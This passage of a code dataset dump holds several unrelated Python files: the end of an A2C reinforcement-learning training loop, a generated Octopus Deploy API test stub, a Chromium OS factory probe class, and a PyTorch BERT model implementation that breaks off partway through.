maybeepinfo:\n self.episodes_count += 1\n epinfos.append(maybeepinfo)\n \n self.states = states\n self.dones = dones\n for n, done in enumerate(dones):\n if done:\n self.obs[n] = self.obs[n]*0\n self.obs = obs\n mb_rewards.append(rewards)\n mb_dones.append(self.dones)\n #batch of steps to batch of rollouts\n mb_obs = np.asarray(mb_obs, dtype=np.uint8).swapaxes(1, 0).reshape(self.batch_ob_shape)\n mb_rewards = np.asarray(mb_rewards, dtype=np.float32).swapaxes(1, 0)\n mb_actions = np.asarray(mb_actions, dtype=np.int32).swapaxes(1, 0)\n mb_values = np.asarray(mb_values, dtype=np.float32).swapaxes(1, 0)\n mb_dones = np.asarray(mb_dones, dtype=np.bool).swapaxes(1, 0)\n mb_masks = mb_dones[:, :-1]\n mb_dones = mb_dones[:, 1:]\n last_values = self.model.value(self.obs, self.states, self.dones).tolist()\n #discount/bootstrap off value fn\n for n, (rewards, dones, value) in enumerate(zip(mb_rewards, mb_dones, last_values)):\n rewards = rewards.tolist()\n dones = dones.tolist()\n if dones[-1] == 0:\n rewards = discount_with_dones(rewards+[value], dones+[0], self.gamma)[:-1]\n else:\n rewards = discount_with_dones(rewards, dones, self.gamma)\n mb_rewards[n] = rewards\n mb_rewards = mb_rewards.flatten()\n mb_actions = mb_actions.flatten()\n mb_values = mb_values.flatten()\n mb_masks = mb_masks.flatten()\n return mb_obs, mb_states, mb_rewards, mb_masks, mb_actions, mb_values, epinfos\n\ndef learn(policy, env, seed, nsteps=5, total_timesteps=int(80e6), vf_coef=0.5, ent_coef=0.01, max_grad_norm=0.5, lr=7e-4, lrschedule='linear', epsilon=1e-5, alpha=0.99, gamma=0.99, log_interval=100):\n set_global_seeds(seed)\n\n nenvs = env.num_envs\n ob_space = env.observation_space\n ac_space = env.action_space\n model = Model(policy=policy, ob_space=ob_space, ac_space=ac_space, nenvs=nenvs, nsteps=nsteps, ent_coef=ent_coef, vf_coef=vf_coef,\n max_grad_norm=max_grad_norm, lr=lr, alpha=alpha, epsilon=epsilon, total_timesteps=total_timesteps, lrschedule=lrschedule)\n runner = Runner(env, model, nsteps=nsteps, gamma=gamma)\n\n epinfobuf = deque(maxlen=100)\n\n nbatch = nenvs*nsteps\n tstart = time.time()\n for update in range(1, total_timesteps//nbatch+1):\n obs, states, rewards, masks, actions, values, epinfos = runner.run()\n epinfobuf.extend(epinfos)\n policy_loss, value_loss, policy_entropy = model.train(obs, states, rewards, masks, actions, values)\n nseconds = time.time()-tstart\n fps = int((update*nbatch)/nseconds)\n if update % log_interval == 0 or update == 1:\n ev = explained_variance(values, rewards)\n logger.record_tabular(\"nupdates\", update)\n logger.record_tabular(\"total_timesteps\", update*nbatch)\n logger.record_tabular(\"fps\", fps)\n logger.logkv('eprewmean', safemean([epinfo['r'] for epinfo in epinfobuf]))\n logger.logkv('eplenmean', safemean([epinfo['l'] for epinfo in epinfobuf]))\n logger.record_tabular(\"policy_entropy\", float(policy_entropy))\n logger.record_tabular(\"value_loss\", float(value_loss))\n logger.record_tabular(\"explained_variance\", float(ev))\n logger.logkv('time_elapsed', nseconds)\n logger.dump_tabular()\n logger.logkv('episodes', runner.episodes_count)\n env.close()\n return model\n\ndef safemean(xs):\n return np.nan if len(xs) == 0 else np.mean(xs)\n\n"} {"ext": "py", "sha": "1a2f526a0b6bfaf86b7b7d940e635a431f8a6643", "content": "# coding: utf-8\n\n\"\"\"\n Octopus Server API\n\n No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501\n\n OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport octopus_deploy_swagger_client\nfrom octopus_deploy_swagger_client.models.display_info import DisplayInfo # noqa: E501\nfrom octopus_deploy_swagger_client.rest import ApiException\n\n\nclass TestDisplayInfo(unittest.TestCase):\n \"\"\"DisplayInfo unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testDisplayInfo(self):\n \"\"\"Test DisplayInfo\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = octopus_deploy_swagger_client.models.display_info.DisplayInfo() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f52e30a61dbd98a07f21b4a7c3f8256082840", "content": "# Copyright 2018 The Chromium OS Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom cros.factory.probe import function\n\n\nclass ActionFunction(function.Function):\n \"\"\"The base class of action functions.\n\n While evaluation, an action function executes a side-effect action. If the\n action is successfully executed, it returns the input data. Otherwise it\n returns an empty list to notify the computation failed.\n \"\"\"\n def Apply(self, data):\n if self.Action():\n return data\n return function.NOTHING\n\n def Action(self):\n \"\"\"Execute an action and return the action is successfully or not.\"\"\"\n raise NotImplementedError\n"} {"ext": "py", "sha": "1a2f5306e653c319496dc7b1f573882ee48345f4", "content": "# coding=utf-8\n# Copyright 2018 The Google AI Language Team Authors and The HugginFace Inc. team.\n# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\n# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"PyTorch BERT model.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nimport copy\nimport json\nimport math\nimport logging\nimport tarfile\nimport tempfile\nimport shutil\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.nn import CrossEntropyLoss\n\nfrom torch.utils.checkpoint import checkpoint\n\nfrom olfmlm.data_utils.file_utils import cached_path\n\nlogger = logging.getLogger(__name__)\n\nPRETRAINED_MODEL_ARCHIVE_MAP = {\n 'bert-base-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased.tar.gz\",\n 'bert-large-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased.tar.gz\",\n 'bert-base-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased.tar.gz\",\n 'bert-large-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased.tar.gz\",\n 'bert-base-multilingual-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased.tar.gz\",\n 'bert-base-multilingual-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased.tar.gz\",\n 'bert-base-chinese': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese.tar.gz\",\n}\nCONFIG_NAME = 'bert_config.json'\nWEIGHTS_NAME = 'pytorch_model.bin'\nTF_WEIGHTS_NAME = 'model.ckpt'\n\ndef load_tf_weights_in_bert(model, tf_checkpoint_path):\n \"\"\" Load tf checkpoints in a pytorch model\n \"\"\"\n try:\n import re\n import numpy as np\n import tensorflow as tf\n except ImportError:\n print(\"Loading a TensorFlow models in PyTorch, requires TensorFlow to be installed. Please see \"\n \"https://www.tensorflow.org/install/ for installation instructions.\")\n raise\n tf_path = os.path.abspath(tf_checkpoint_path)\n print(\"Converting TensorFlow checkpoint from {}\".format(tf_path))\n # Load weights from TF model\n init_vars = tf.train.list_variables(tf_path)\n names = []\n arrays = []\n for name, shape in init_vars:\n print(\"Loading TF weight {} with shape {}\".format(name, shape))\n array = tf.train.load_variable(tf_path, name)\n names.append(name)\n arrays.append(array)\n\n for name, array in zip(names, arrays):\n name = name.split('/')\n # adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v\n # which are not required for using pretrained model\n if any(n in [\"adam_v\", \"adam_m\"] for n in name):\n print(\"Skipping {}\".format(\"/\".join(name)))\n continue\n pointer = model\n for m_name in name:\n if re.fullmatch(r'[A-Za-z]+_\\d+', m_name):\n l = re.split(r'_(\\d+)', m_name)\n else:\n l = [m_name]\n if l[0] == 'kernel' or l[0] == 'gamma':\n pointer = getattr(pointer, 'weight')\n elif l[0] == 'output_bias' or l[0] == 'beta':\n pointer = getattr(pointer, 'bias')\n elif l[0] == 'output_weights':\n pointer = getattr(pointer, 'weight')\n else:\n pointer = getattr(pointer, l[0])\n if len(l) >= 2:\n num = int(l[1])\n pointer = pointer[num]\n if m_name[-11:] == '_embeddings':\n pointer = getattr(pointer, 'weight')\n elif m_name == 'kernel':\n array = np.transpose(array)\n try:\n assert pointer.shape == array.shape\n except AssertionError as e:\n e.args += (pointer.shape, array.shape)\n raise\n print(\"Initialize PyTorch weight {}\".format(name))\n pointer.data = torch.from_numpy(array)\n return model\n\n\ndef gelu(x):\n \"\"\"Implementation of the gelu activation function.\n For information: OpenAI GPT's gelu is slightly different (and gives slightly different results):\n 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n \"\"\"\n return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))\n\n\ndef swish(x):\n return x * torch.sigmoid(x)\n\n\nACT2FN = {\"gelu\": gelu, \"relu\": torch.nn.functional.relu, \"swish\": swish}\n\nclass BertConfig(object):\n \"\"\"Configuration class to store the configuration of a `BertModel`.\n \"\"\"\n def __init__(self,\n vocab_size_or_config_json_file,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=2,\n initializer_range=0.02,\n fp32_layernorm=True,\n fp32_embedding=True,\n fp32_tokentypes=False,\n layernorm_epsilon=1e-12):\n \"\"\"Constructs BertConfig.\n\n Args:\n vocab_size_or_config_json_file: Vocabulary size of `inputs_ids` in `BertModel`.\n hidden_size: Size of the encoder layers and the pooler layer.\n num_hidden_layers: Number of hidden layers in the Transformer encoder.\n num_attention_heads: Number of attention heads for each attention layer in\n the Transformer encoder.\n intermediate_size: The size of the \"intermediate\" (i.e., feed-forward)\n layer in the Transformer encoder.\n hidden_act: The non-linear activation function (function or string) in the\n encoder and pooler. If string, \"gelu\", \"relu\" and \"swish\" are supported.\n hidden_dropout_prob: The dropout probabilitiy for all fully connected\n layers in the embeddings, encoder, and pooler.\n attention_probs_dropout_prob: The dropout ratio for the attention\n probabilities.\n max_position_embeddings: The maximum sequence length that this model might\n ever be used with. Typically set this to something large just in case\n (e.g., 512 or 1024 or 2048).\n type_vocab_size: The vocabulary size of the `token_type_ids` passed into\n `BertModel`.\n initializer_range: The sttdev of the truncated_normal_initializer for\n initializing all weight matrices.\n \"\"\"\n if isinstance(vocab_size_or_config_json_file, str):\n with open(vocab_size_or_config_json_file, \"r\", encoding='utf-8') as reader:\n json_config = json.loads(reader.read())\n for key, value in json_config.items():\n self.__dict__[key] = value\n elif isinstance(vocab_size_or_config_json_file, int):\n self.vocab_size = vocab_size_or_config_json_file\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n self.fp32_layernorm = fp32_layernorm\n self.fp32_embedding = fp32_embedding\n self.layernorm_epsilon = layernorm_epsilon\n self.fp32_tokentypes = fp32_tokentypes\n else:\n raise ValueError(\"First argument must be either a vocabulary size (int)\"\n \"or the path to a pretrained model config file (str)\")\n\n @classmethod\n def from_dict(cls, json_object):\n \"\"\"Constructs a `BertConfig` from a Python dictionary of parameters.\"\"\"\n config = BertConfig(vocab_size_or_config_json_file=-1)\n for key, value in json_object.items():\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n \"\"\"Constructs a `BertConfig` from a json file of parameters.\"\"\"\n with open(json_file, \"r\", encoding='utf-8') as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n def __repr__(self):\n return str(self.to_json_string())\n\n def to_dict(self):\n \"\"\"Serializes this instance to a Python dictionary.\"\"\"\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n\n# try:\n# from apex.normalization.fused_layer_norm import FusedLayerNorm as BertLayerNorm\n# except ImportError:\n# print(\"Better speed can be achieved with apex installed from https://www.github.com/nvidia/apex.\")\n# class BertLayerNorm(nn.Module):\n# def __init__(self, hidden_size, eps=1e-12):\n# \"\"\"Construct a layernorm module in the TF style (epsilon inside the square root).\n# \"\"\"\n# super(BertLayerNorm, self).__init__()\n# self.weight = nn.Parameter(torch.ones(hidden_size))\n# self.bias = nn.Parameter(torch.zeros(hidden_size))\n# self.variance_epsilon = eps\n\n# def forward(self, x):\n# u = x.mean(-1, keepdim=True)\n# s = (x - u).pow(2).mean(-1, keepdim=True)\n# x = (x - u) / torch.sqrt(s + self.variance_epsilon)\n# return self.weight * x + self.bias\n\nclass BertLayerNorm(nn.Module):\n def __init__(self, hidden_size, eps=1e-12):\n \"\"\"Construct a layernorm module in the TF style (epsilon inside the square root).\n \"\"\"\n super(BertLayerNorm, self).__init__()\n self.weight = nn.Parameter(torch.ones(hidden_size))\n self.bias = nn.Parameter(torch.zeros(hidden_size))\n self.variance_epsilon = eps\n\n def forward(self, x):\n u = x.mean(-1, keepdim=True)\n s = (x - u).pow(2).mean(-1, keepdim=True)\n x = (x - u) / torch.sqrt(s + self.variance_epsilon)\n return self.weight * x + self.bias\n\nclass BertEmbeddings(nn.Module):\n \"\"\"Construct the embeddings from word, position and token_type embeddings.\n \"\"\"\n def __init__(self, config):\n super(BertEmbeddings, self).__init__()\n self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=0)\n self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)\n self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)\n self.task_type_embeddings = nn.Embedding(config.num_tasks, config.hidden_size)\n\n # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load\n # any TensorFlow checkpoint file\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, input_ids, token_type_ids=None, task_ids=None):\n seq_length = input_ids.size(1)\n position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)\n position_ids = position_ids.unsqueeze(0).expand_as(input_ids)\n if token_type_ids is None:\n token_type_ids = torch.zeros_like(input_ids)\n if task_ids is None:\n task_ids = torch.zeros_like(input_ids)\n\n words_embeddings = self.word_embeddings(input_ids)\n position_embeddings = self.position_embeddings(position_ids)\n token_type_embeddings = self.token_type_embeddings(token_type_ids)\n task_embeddings = self.task_type_embeddings(task_ids)\n\n embeddings = words_embeddings + position_embeddings + token_type_embeddings + task_embeddings\n embeddings = self.LayerNorm(embeddings)\n embeddings = self.dropout(embeddings)\n return embeddings\n\n\nclass BertSelfAttention(nn.Module):\n def __init__(self, config):\n super(BertSelfAttention, self).__init__()\n if config.hidden_size % config.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size (%d) is not a multiple of the number of attention \"\n \"heads (%d)\" % (config.hidden_size, config.num_attention_heads))\n self.num_attention_heads = config.num_attention_heads\n self.attention_head_size = int(config.hidden_size / config.num_attention_heads)\n self.all_head_size = self.num_attention_heads * self.attention_head_size\n\n self.query = nn.Linear(config.hidden_size, self.all_head_size)\n self.key = nn.Linear(config.hidden_size, self.all_head_size)\n self.value = nn.Linear(config.hidden_size, self.all_head_size)\n\n self.dropout = nn.Dropout(config.attention_probs_dropout_prob)\n\n def transpose_for_scores(self, x):\n new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)\n x = x.view(*new_x_shape)\n return x.permute(0, 2, 1, 3)\n\n def forward(self, hidden_states, attention_mask):\n\n mixed_query_layer = self.query(hidden_states)\n mixed_key_layer = self.key(hidden_states)\n mixed_value_layer = self.value(hidden_states)\n\n query_layer = self.transpose_for_scores(mixed_query_layer)\n key_layer = self.transpose_for_scores(mixed_key_layer)\n value_layer = self.transpose_for_scores(mixed_value_layer)\n\n # Take the dot product between \"query\" and \"key\" to get the raw attention scores.\n attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))\n attention_scores = attention_scores / math.sqrt(self.attention_head_size)\n # Apply the attention mask is (precomputed for all layers in BertModel forward() function)\n attention_scores = attention_scores + attention_mask\n\n # Normalize the attention scores to probabilities.\n attention_probs = nn.Softmax(dim=-1)(attention_scores)\n\n # This is actually dropping out entire tokens to attend to, which might\n # seem a bit unusual, but is taken from the original Transformer paper.\n attention_probs = self.dropout(attention_probs)\n \n previous_type = attention_probs.type()\n context_layer = torch.matmul(attention_probs, value_layer)\n context_layer = context_layer.permute(0, 2, 1, 3).contiguous()\n new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)\n context_layer = context_layer.view(*new_context_layer_shape)\n return context_layer\n\n\nclass BertSelfOutput(nn.Module):\n def __init__(self, config):\n super(BertSelfOutput, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.fp32_layernorm = config.fp32_layernorm\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layernorm_epsilon)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n ln_input = hidden_states + input_tensor\n previous_type = ln_input.type()\n if self.fp32_layernorm:\n ln_input = ln_input.float()\n hidden_states = self.LayerNorm(ln_input)\n if self.fp32_layernorm:\n hidden_states = hidden_states.type(previous_type)\n return hidden_states\n\n\nclass BertAttention(nn.Module):\n def __init__(self, config):\n super(BertAttention, self).__init__()\n self.self = BertSelfAttention(config)\n self.output = BertSelfOutput(config)\n\n def forward(self, input_tensor, attention_mask):\n self_output = self.self(input_tensor, attention_mask)\n attention_output = self.output(self_output, input_tensor)\n return attention_output\n\n\nclass BertIntermediate(nn.Module):\n def __init__(self, config):\n super(BertIntermediate, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.intermediate_size)\n self.intermediate_act_fn = ACT2FN[config.hidden_act] \\\n if isinstance(config.hidden_act, str) else config.hidden_act\n\n def forward(self, hidden_states):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n return hidden_states\n\n\nclass BertOutput(nn.Module):\n def __init__(self, config):\n super(BertOutput, self).__init__()\n self.dense = nn.Linear(config.intermediate_size, config.hidden_size)\n self.fp32_layernorm = config.fp32_layernorm\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layernorm_epsilon)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n ln_input = hidden_states + input_tensor\n previous_type = ln_input.type()\n if self.fp32_layernorm:\n ln_input = ln_input.float()\n hidden_states = self.LayerNorm(ln_input)\n if self.fp32_layernorm:\n hidden_states = hidden_states.type(previous_type)\n return hidden_states\n\n\nclass BertLayer(nn.Module):\n def __init__(self, config):\n super(BertLayer, self).__init__()\n self.attention = BertAttention(config)\n self.intermediate = BertIntermediate(config)\n self.output = BertOutput(config)\n\n def forward(self, hidden_states, attention_mask):\n attention_output = self.attention(hidden_states, attention_mask)\n intermediate_output = self.intermediate(attention_output)\n layer_output = self.output(intermediate_output, attention_output)\n return layer_output\n\n\nclass BertEncoder(nn.Module):\n def __init__(self, config):\n super(BertEncoder, self).__init__()\n layer = BertLayer(config)\n self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(config.num_hidden_layers)])\n\n # def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):\n # all_encoder_layers = []\n # for layer_module in self.layer:\n # hidden_states = layer_module(hidden_states, attention_mask)\n # if output_all_encoded_layers:\n # all_encoder_layers.append(hidden_states)\n # if not output_all_encoded_layers:\n # all_encoder_layers.append(hidden_states)\n # return all_encoder_layers\n def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True, checkpoint_activations=False):\n all_encoder_layers = []\n def custom(start, end):\n def custom_forward(*inputs):\n layers = self.layer[start:end]\n x_ = inputs[0]\n for layer in layers:\n x_ = layer(x_, inputs[1])\n return x_\n return custom_forward\n\n if checkpoint_activations:\n l = 0\n num_layers = len(self.layer)\n chunk_length = math.ceil(math.sqrt(num_layers))\n while l < num_layers:\n hidden_states = checkpoint(custom(l, l+chunk_length), hidden_states, attention_mask*1)\n l += chunk_length\n # decoder layers\n else:\n for i,layer_module in enumerate(self.layer):\n hidden_states = layer_module(hidden_states, attention_mask)\n\n if output_all_encoded_layers:\n all_encoder_layers.append(hidden_states)\n\n if not output_all_encoded_layers or checkpoint_activations:\n all_encoder_layers.append(hidden_states)\n return all_encoder_layers\n\n\nclass BertPooler(nn.Module):\n def __init__(self, config):\n super(BertPooler, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.activation = nn.Tanh()\n\n def forward(self, hidden_states):\n # We \"pool\" the model by simply taking the hidden state corresponding\n # to the first token.\n first_token_tensor = hidden_states[:, 0]\n pooled_output = self.dense(first_token_tensor)\n pooled_output = self.activation(pooled_output)\n return pooled_output\n\n\nclass BertPredictionHeadTransform(nn.Module):\n def __init__(self, config):\n super(BertPredictionHeadTransform, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.transform_act_fn = ACT2FN[config.hidden_act] \\\n if isinstance(config.hidden_act, str) else config.hidden_act\n self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layernorm_epsilon)\n self.fp32_layernorm = config.fp32_layernorm\n\n def forward(self, hidden_states):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.transform_act_fn(hidden_states)\n previous_type = hidden_states.type()\n if self.fp32_layernorm:\n hidden_states = hidden_states.float()\n hidden_states = self.LayerNorm(hidden_states)\n if self.fp32_layernorm:\n hidden_states = hidden_states.type(previous_type)\n return hidden_states\n\n\nclass BertLMPredictionHead(nn.Module):\n def __init__(self, config, bert_model_embedding_weights):\n super(BertLMPredictionHead, self).__init__()\n self.transform = BertPredictionHeadTransform(config)\n\n # The output weights are the same as the input embeddings, but there is\n # an output-only bias for each token.\n self.decoder = nn.Linear(bert_model_embedding_weights.size(1),\n bert_model_embedding_weights.size(0),\n bias=False)\n self.decoder.weight = bert_model_embedding_weights\n self.bias = nn.Parameter(torch.zeros(bert_model_embedding_weights.size(0)))\n\n def forward(self, hidden_states):\n hidden_states = self.transform(hidden_states)\n hidden_states = self.decoder(hidden_states) + self.bias\n return hidden_states\n\nclass BertOnlyMLMHead(nn.Module):\n def __init__(self, config, bert_model_embedding_weights):\n super(BertOnlyMLMHead, self).__init__()\n self.predictions = BertLMPredictionHead(config, bert_model_embedding_weights)\n\n def forward(self, sequence_output):\n prediction_scores = self.predictions(sequence_output)\n return prediction_scores\n\n\nclass BertOnlyNSPHead(nn.Module):\n def __init__(self, config):\n super(BertOnlyNSPHead, self).__init__()\n self.seq_relationship = nn.Linear(config.hidden_size, 2)\n\n def forward(self, pooled_output):\n seq_relationship_score = self.seq_relationship(pooled_output)\n return seq_relationship_score\n\n\nclass BertPreTrainingHeads(nn.Module):\n def __init__(self, config, bert_model_embedding_weights):\n super(BertPreTrainingHeads, self).__init__()\n self.predictions = BertLMPredictionHead(config, bert_model_embedding_weights)\n self.seq_relationship = nn.Linear(config.hidden_size, 2)\n\n def forward(self, sequence_output, pooled_output):\n prediction_scores = self.predictions(sequence_output)\n for p in self.seq_relationship.parameters():\n if p is None:\n continue\n pooled_output = pooled_output.type_as(p)\n seq_relationship_score = self.seq_relationship(pooled_output)\n return prediction_scores, seq_relationship_score\n\n\nclass PreTrainedBertModel(nn.Module):\n \"\"\" An abstract class to handle weights initialization and\n a simple interface for dowloading and loading pretrained models.\n \"\"\"\n def __init__(self, config, *inputs, **kwargs):\n super(PreTrainedBertModel, self).__init__()\n if not isinstance(config, BertConfig):\n raise ValueError(\n \"Parameter config in `{}(config)` should be an instance of class `BertConfig`. \"\n \"To create a model from a Google pretrained model use \"\n \"`model = {}.from_pretrained(PRETRAINED_MODEL_NAME)`\".format(\n self.__class__.__name__, self.__class__.__name__\n ))\n self.config = config\n\n def init_bert_weights(self, module):\n \"\"\" Initialize the weights.\n \"\"\"\n if isinstance(module, (nn.Linear, nn.Embedding)):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n elif isinstance(module, BertLayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name, state_dict=None, cache_dir=None,\n fp32_layernorm=False, fp32_embedding=False, layernorm_epsilon=1e-12,\n fp32_tokentypes=False, *inputs, **kwargs):\n \"\"\"\n Instantiate a PreTrainedBertModel from a pre-trained model file or a pytorch state dict.\n Download and cache the pre-trained model file if needed.\n\n Params:\n pretrained_model_name: either:\n - a str with the name of a pre-trained model to load selected in the list of:\n . `bert-base-uncased`\n . `bert-large-uncased`\n . `bert-base-cased`\n . `bert-large-cased`\n . `bert-base-multilingual-uncased`\n . `bert-base-multilingual-cased`\n . `bert-base-chinese`\n - a path or url to a pretrained model archive containing:\n . `bert_config.json` a configuration file for the model\n . `pytorch_model.bin` a PyTorch dump of a BertForPreTraining instance\n cache_dir: an optional path to a folder in which the pre-trained models will be cached.\n state_dict: an optional state dictionnary (collections.OrderedDict object) to use instead of Google pre-trained models\n *inputs, **kwargs: additional input for the specific Bert class\n (ex: num_labels for BertForSequenceClassification)\n \"\"\"\n if pretrained_model_name in PRETRAINED_MODEL_ARCHIVE_MAP:\n archive_file = PRETRAINED_MODEL_ARCHIVE_MAP[pretrained_model_name]\n else:\n archive_file = pretrained_model_name\n # redirect to the cache, if necessary\n try:\n resolved_archive_file = cached_path(archive_file, cache_dir=cache_dir)\n except FileNotFoundError:\n logger.error(\n \"Model name '{}' was not found in model name list ({}). \"\n \"We assumed '{}' was a path or url but couldn't find any file \"\n \"associated to this path or url.\".format(\n pretrained_model_name,\n ', '.join(PRETRAINED_MODEL_ARCHIVE_MAP.keys()),\n archive_file))\n return None\n if resolved_archive_file == archive_file:\n logger.info(\"loading archive file {}\".format(archive_file))\n else:\n logger.info(\"loading archive file {} from cache at {}\".format(\n archive_file, resolved_archive_file))\n tempdir = None\n if os.path.isdir(resolved_archive_file):\n serialization_dir = resolved_archive_file\n else:\n # Extract archive to temp dir\n tempdir = tempfile.mkdtemp()\n logger.info(\"extracting archive file {} to temp dir {}\".format(\n resolved_archive_file, tempdir))\n with tarfile.open(resolved_archive_file, 'r:gz') as archive:\n archive.extractall(tempdir)\n serialization_dir = tempdir\n # Load config\n config_file = os.path.join(serialization_dir, CONFIG_NAME)\n config = BertConfig.from_json_file(config_file)\n config.fp32_layernorm = fp32_layernorm\n config.fp32_embedding = fp32_embedding\n config.layernorm_epsilon = layernorm_epsilon\n config.fp32_tokentypes = fp32_tokentypes\n logger.info(\"Model config {}\".format(config))\n # Instantiate model.\n model = cls(config, *inputs, **kwargs)\n if state_dict is None:\n weights_path = os.path.join(serialization_dir, WEIGHTS_NAME)\n state_dict = torch.load(weights_path)\n\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n if 'gamma' in key:\n new_key = key.replace('gamma', 'weight')\n if 'beta' in key:\n new_key = key.replace('beta', 'bias')\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n missing_keys = []\n unexpected_keys = []\n error_msgs = []\n # copy state_dict so _load_from_state_dict can modify it\n metadata = getattr(state_dict, '_metadata', None)\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n def load(module, prefix=''):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n module._load_from_state_dict(\n state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)\n for name, child in module._modules.items():\n if child is not None:\n load(child, prefix + name + '.')\n load(model, prefix='' if hasattr(model, 'bert') else 'bert.')\n if len(missing_keys) > 0:\n logger.info(\"Weights of {} not initialized from pretrained model: {}\".format(\n model.__class__.__name__, missing_keys))\n if len(unexpected_keys) > 0:\n logger.info(\"Weights from pretrained model not used in {}: {}\".format(\n model.__class__.__name__, unexpected_keys))\n if tempdir:\n # Clean up temp dir\n shutil.rmtree(tempdir)\n return model\n\n\nclass BertModel(PreTrainedBertModel):\n \"\"\"BERT model (\"Bidirectional Embedding Representations from a Transformer\").\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, 